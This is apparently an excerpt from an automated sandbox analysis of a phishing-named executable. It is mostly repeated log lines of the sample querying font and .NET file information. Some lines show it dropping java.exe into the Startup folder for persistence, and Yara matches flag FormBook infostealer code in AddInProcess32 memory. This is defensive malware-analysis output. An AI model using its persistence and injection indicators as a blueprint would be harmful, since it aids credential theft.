          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeQueries volume information: C:\Users\user\AppData\Local\Temp\java.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 33.0.AddInProcess32.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.AddInProcess32.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000022.00000000.562360179.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.808079827.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000000.561892180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.807067648.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.653301219.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
